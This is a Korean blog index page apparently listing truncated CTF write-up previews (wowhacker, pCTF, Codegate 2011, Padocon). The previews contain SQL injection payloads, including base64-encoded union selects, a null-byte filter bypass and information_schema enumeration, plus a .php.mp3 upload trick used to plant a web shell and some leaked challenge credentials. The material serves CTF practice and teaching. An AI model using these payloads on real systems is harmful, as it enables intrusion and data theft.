본문 바로가기

컴터 때찌/CTF

[wowhacker] 7번(AuThWithMySQL) [사이트 접속시 Apache 인증 요구하는 AuThWithMySQL/index.html 페이지 공략] [인증 우회를 위해 HTTP Method Get-> Options와 동시에 Leo/1234로 로그인] 사이트의 인증값(아이디/비밀번호)을 base64 encoding되어서 인증 값으로 쓰는 것 확인함 TGVvOjEyMzQ= // Leo:1234 ID 칸에 쿼터를 넣고 base64 암호화 해서 보내면 mysql 오류 발생(sql injection) 필드 수를 알아 내기 위해 하나씩 늘려서 시도 Leo'union select '1'#:1234 TGVvJ3VuaW9uIHNlbGVjdCAnMScjOjEyMzQ= Leo'union select '1','2'#:1234 TGVvJ3VuaW9uIHNlbGVjdCAnM.. 더보기
pCTF[14] Sha1 is fun $password = sha1($_POST['password'], true); $username = htmlspecialchars($_POST['username']); $db = mysql_connect("localhost", "problem1", "css7UjBmevbm"); mysql_select_db("problem1",$db); $rs = mysql_query("SELECT * FROM authtable WHERE password = "$password" AND username = "{$_POST['username']}""); password를 sha1 암호화해서 sql 문에 넣음 sha1의 끝문자가 5c(\)가 되면 password = "abc\" AND username = "{$_POST['u.. 더보기
[Codegate 2011] Vuln400 쓰기 기능과 검색 기능이 있고 Read me if you can 글이 있는 게시판 공략 Read me if you can을 읽으려하면 비밀번호가 필요함 쓰기 기능이 있는 곳 jpg만 업로드 가능함 검색 search 부분에 쿼터 스트링 사용 금지 라는 메시지가 뜸 This means that they are searching for the single quote character in the query variable. (PPP 보고서 中) 널바이트를 넣고 쿼터를 쓰면 잘됨 http://221.141.3.111/__board/board.php?order=subject&search=%00' union select 'a','b','c','d','e','f','g','h','i','j','k'%23 c가 제목 .. 더보기
[Codegate 2011] Vuln200 일반 아이디로 접속시 Hint1) The flag is hash string. Hint2) Get Administrator account Administrator/a 로 접속시 쿠키 Lang를 빈칸이나 쿼터를 넣고 보내면 sql 오류발생, sql injection 'union select (select group_concat(table_name) from information_schema.tables),1# 'union select (select * from raw_data),1# //x 'union select (select * from raw_data limit 0,1),1#//x 'union select (select group_concat(database(),0x3a,user())),1#//x '.. 더보기
[Codegate 2011] Vuln100 업로드 취약점이 있는 페이지 파일은 mp3 only 업로드 가능 leo2.php.mp3로 우회해서 php를 올리려함 태그가 없다고 오류 mp3 파일에 태그를 넣어 주는 프로그램인 Mp3tag를 이용해서 php파일에 태그를 넣음 웹쉘이 정상적으로 업로드 상위 폴더를 보면 dbconn.php가 있음 dbconn.php에서 mysql 비번 획득 "root","zhemrpdlxm##" 해당 테이블과 컬럼 확인 vul100pwd 테이블 pwpw 컬럼 발견 키 발견 hello,sonic! 더보기
Padocon 2011 WTF400(Doc) 파도콘 끝나고 anow님과 이야기 하다가 base64 명령어가 있다는걸 처음 알았다 머리가 나쁘면 몸이 고생 더보기
천사 같은 올드좀비님의 webhacking.kr 클리어 천사 같은 올드좀비님의 webhacking.kr 클리어 푸는 동안 질문도 많이하고 엄청 귀찮게 했는데 착한 올드좀비님은 정말 성심성의껏 답변해주시고.. 올드좀비님 너무 착한듯 더보기
될듯 될듯 안되네? [ 작성중 ] http://archive.cert.uni-stuttgart.de/bugtraq/2007/10/msg00314.html 471| function write_comment ( $y, $m, $entry, $comment_name, | $comment_email, $comment_url, $comment_text, $user_ip, | $hold_flag='', $comment_date=null ) { | 478| $basedir = 'content/'; 479| $dir = $basedir.$y.'/'.$m.'/'.$entry; | 494| $dir .= '/comments'; | 506| $dir .= '/'; | 512| $stamp = date('ymd-His'); 513| if ( $blog_con.. 더보기

티스토리툴바